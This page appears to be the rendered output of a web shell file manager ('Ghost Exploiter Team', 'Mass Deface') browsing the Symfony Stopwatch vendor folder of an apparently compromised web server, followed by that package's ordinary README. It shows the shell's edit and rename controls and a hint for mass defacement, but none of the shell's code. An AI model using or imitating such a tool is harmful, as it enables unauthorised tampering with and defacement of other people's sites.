Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
symfony
/
stopwatch
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
CHANGELOG.md
0.714KB
edt
ren
LICENSE
1.043KB
edt
ren
README.md
0.905KB
edt
ren
Section.php
3.58KB
edt
ren
Stopwatch.php
3.994KB
edt
ren
StopwatchEvent.php
5.336KB
edt
ren
StopwatchPeriod.php
1.879KB
edt
ren
composer.json
0.702KB
edt
ren
Stopwatch Component =================== The Stopwatch component provides a way to profile code. Getting Started --------------- ```bash composer require symfony/stopwatch ``` ```php use Symfony\Component\Stopwatch\Stopwatch; $stopwatch = new Stopwatch(); // optionally group events into sections (e.g. phases of the execution) $stopwatch->openSection(); // starts event named 'eventName' $stopwatch->start('eventName'); // ... run your code here // optionally, start a new "lap" time $stopwatch->lap('foo'); // ... run your code here $event = $stopwatch->stop('eventName'); $stopwatch->stopSection('phase_1'); ``` Resources --------- * [Contributing](https://symfony.com/doc/current/contributing/index.html) * [Report issues](https://github.com/symfony/symfony/issues) and [send Pull Requests](https://github.com/symfony/symfony/pulls) in the [main Symfony repository](https://github.com/symfony/symfony)